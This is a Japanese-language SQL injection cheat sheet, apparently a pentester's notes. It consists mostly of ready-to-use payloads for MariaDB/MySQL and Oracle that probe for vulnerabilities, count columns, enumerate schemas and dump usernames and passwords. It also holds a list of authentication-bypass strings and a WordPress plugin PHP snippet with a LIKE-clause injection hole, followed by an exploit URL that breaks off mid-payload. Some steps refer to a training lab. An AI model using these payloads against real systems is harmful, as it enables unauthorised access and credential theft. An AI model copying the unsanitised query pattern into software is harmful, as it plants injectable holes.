# SQLinjection

* 脆弱性の確認

```
'or 1=1;#
'
< > ' " { } ;
```

※システムエラー画面に遷移したら脆弱性と判断して問題ない

* 1行のみ表示

```
'or 1=1 LIMIT 1;#
```

* カラム数の確認

```
'or 1=1 order by 1;#
```

カラム数を1から徐々に増やしていくことでテーブルに何カラムあるかがわかる。

カラム数を超えるとSQLがエラーとなる

※Burpsuiteのrepeaterを利用して効率的に確認が可能

* どのカラムが何番目のカラムかの確認

```
'or 1=1 union all select 1, 2, 3;#
```

* MariaDBのデータベースバージョンの確認

```
'or 1=1 union all select 1, 2, @@version;#
```

* 現在のユーザの確認

```
'or 1=1 union all select 1, 2, user();#
```

* スキーマテーブルの確認

```
'or 1=1 union all select 1, 2, table_name from information_schema.tables;#
```

* 対象のテーブルのカラムの確認

```
'or 1=1 union all select 1, 2, column_name from information_schema.columns where table_name='users';#
```

* 情報の列挙

```
'or 1=1 union all select 1, username, password from users;#
```



#### SQL実行できるかの確認

SQLの構造を推定しながら複数文字ためしていく(DBに合わせてMSSQL Injection PWNageなどの検索で見つける)

https://www.exploit-db.com/papers/12975

↑ほかにもSQLに関するたくさんのことが書いてありかなり有益なサイト

```
	+-----------------------------+
	|	  ' or 1=1 --	      |
	|	  a' or 1=1 --	      |
	|	  " or 1=1 --	      |
	|	  a" or 1=1 --	      |
	|	  ' or 1=1 #	      |
	|	  " or 1=1 #	      |
	|	  or 1=1 --	      |
	|	  ' or 'x'='x	      |
	|	  " or "x"="x	      |
	|	  ') or ('x'='x	      |
	|	  ") or ("x"="x	      |
	| ' or username LIKE '%admin% |
	+-----------------------------+
	|      USERNAME:  ' or 1/*    |
	|      PASSWORD:  */ =1 --    |
	+-----------------------------+
	|  USERNAME: admin' or 'a'='a |
	|  PASSWORD: '#		      |
	+-----------------------------+
```

SQLが上記のサンプルコードで刺さればAuthentication bypassをすることも可能な場合もある



### MariaDB(MySQL DB)

ログイン

```
mysql --host=127.0.0.1 --port=13306 --user=wp -p
```

権限の確認

```
SHOW Grants;
```

変数の確認

```
show variables;
```



### Oracle SQL injection

https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle

脆弱性の確認

```
< > ' " { } ;
```

500 internal Server Error

レコード全表示

```
' or 1=1 --
```

カラム数の確認

```
'or 1=1 order by 1 --
'or 1=1 order by 2 --
'or 1=1 order by 3 --
'or 1=1 order by 4 --
```

![image-20230225235709643](img/SQLinjection/image-20230225235709643.png)

テーブル名の確認（カラム数3の場合）

```
'or 1=1 union select table_name, null, null FROM all_tables--
```

カラム名の確認（カラム数3の場合）

```
'or 1=1 union select column_name, null, null FROM all_tab_columns WHERE table_name='WEB_ADMINS'--
```

テーブルのレコードの確認

```
'or 1=1 union select ADMIN_NAME, PASSWORD, ADMIN_ID FROM WEB_ADMINS--
```

* カラム同士の型があっていないとエラーになるので注意

```
ADMIN_NAME, NULL, NULL
NULL, ADMIN_NAME, NULL
NULL, NULL, ADMIN_NAME
```

のように順々に型の合うカラムを探していけばよい



### php like句のSQL injection (sqlmapのコマンドを転記）

```php
if (isset($_GET['wpas_keys'])) {
	$wpas_keys = $_GET['wpas_keys'];
}
...
$wpas_keys = str_replace(' ','%',$wpas_keys);
	$pageposts = $wpdb->get_results("SELECT * FROM $wpdb->posts WHERE (post_title LIKE '%$wpas_keys%') AND post_status = 'publish' ORDER BY post_date DESC");
```

```
/wp/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=-6622')/**/OR/**/QUARTER(NULL)/**/IS/**/NULL/**/AND/**/
```

